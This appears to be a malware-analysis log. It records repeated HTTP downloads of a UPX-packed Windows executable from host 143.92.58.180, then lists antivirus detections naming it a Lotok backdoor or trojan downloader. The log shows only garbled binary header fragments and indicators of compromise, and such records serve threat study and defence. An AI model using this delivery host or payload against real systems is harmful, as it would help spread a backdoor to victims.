buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:13 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:14 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:14 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:16 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:16 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:17 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 812
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:17 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:18 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:19 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:19 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:20 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 800
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:21 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:22 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 824
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:26 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:29 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 828
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:29 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" date: Wed, 18 Oct 2023 00:47:31 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:32 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 840
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:32 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 844
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:33 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 832
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes content-disposition: attachment; filename="1" content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT date: Wed, 18 Oct 2023 00:47:34 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 776
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:34 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 836
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" content-type: application/octet-stream etag: "0:83670:652ab7b7:2c77226c" accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:35 GMT MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $aõ%s¦%s¦%s¦s`¦s¦¦}¦s¦q=C¦?s¦Ú>y¦(s¦%r¦xs¦G`¦<s¦8y¦÷s¦8x¦s¦%s¦¤s¦âu¦$s¦Rich%s¦PEL¸õTà à@P 0>` @@€Ào$uÄ@$5pUPX0P €àUPX1à` à@à.rsrc@@:ä@À
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-type: application/octet-stream last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" accept-ranges: bytes etag: "0:83670:652ab7b7:2c77226c" date: Wed, 18 Oct 2023 00:47:36 GMT
received: 1024
socket: 832
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:37 GMT
received: 1024
socket: 796
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 content-disposition: attachment; filename="1" last-modified: Sat, 14 Oct 2023 15:45:59 GMT etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream accept-ranges: bytes date: Wed, 18 Oct 2023 00:47:38 GMT
received: 1024
socket: 832
1 1024 0

recv

buffer: HTTP/1.1 200 OK content-length: 538224 accept-ranges: bytes last-modified: Sat, 14 Oct 2023 15:45:59 GMT content-disposition: attachment; filename="1" etag: "0:83670:652ab7b7:2c77226c" content-type: application/octet-stream date: Wed, 18 Oct 2023 00:47:39 GMT
received: 1024
socket: 844
1 1024 0
host 143.92.58.180
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Lotok.4!c
MicroWorld-eScan Gen:Variant.Doina.65070
Skyhigh BehavesLike.Win32.NetLoader.lh
ALYac Gen:Variant.Doina.65070
Cylance unsafe
VIPRE Gen:Variant.Doina.65070
CrowdStrike win/malicious_confidence_90% (W)
Alibaba Backdoor:Win32/Lotok.1d26da00
K7GW Trojan-Downloader ( 005ac8791 )
K7AntiVirus Trojan-Downloader ( 005ac8791 )
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Agent.HHI
APEX Malicious
Cynet Malicious (score: 100)
Kaspersky HEUR:Backdoor.Win32.Lotok.gen
BitDefender Gen:Variant.Doina.65070
Avast Win32:RATX-gen [Trj]
Tencent Trojan.Win32.Agent_yh.16001053
Emsisoft Gen:Variant.Doina.65070 (B)
F-Secure Trojan.TR/Dldr.Agent.otkvn
DrWeb Trojan.DownLoader46.24420
FireEye Generic.mg.dc62653f9e2468f5
Sophos Mal/Generic-S
Ikarus Trojan-Downloader.Win32.Agent
GData Gen:Variant.Doina.65070
Webroot W32.Trojan.Agent.Gen
Google Detected
Avira TR/Dldr.Agent.otkvn
Antiy-AVL Trojan[Backdoor]/Win32.Lotok
Arcabit Trojan.Doina.DFE2E
ZoneAlarm HEUR:Backdoor.Win32.Lotok.gen
Microsoft Trojan:Win32/Casdet!rfn
Varist W32/ABRisk.YRPR-3326
AhnLab-V3 Trojan/Win.Generic.C5509670
McAfee Artemis!DC62653F9E24
MAX malware (ai score=85)
VBA32 Backdoor.Farfli
Malwarebytes Trojan.Downloader
Panda Trj/Chgt.AD
TrendMicro-HouseCall TROJ_GEN.R002H09JE23
Rising Backdoor.Lotok!8.111D5 (TFE:5:JRMfPVkrx8T)
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.101018141.susgen
Fortinet W32/Agent.HHI!tr.dldr
BitDefenderTheta Gen:NN.ZedlaF.36738.eu4@aukuV8ki
AVG Win32:RATX-gen [Trj]
DeepInstinct MALICIOUS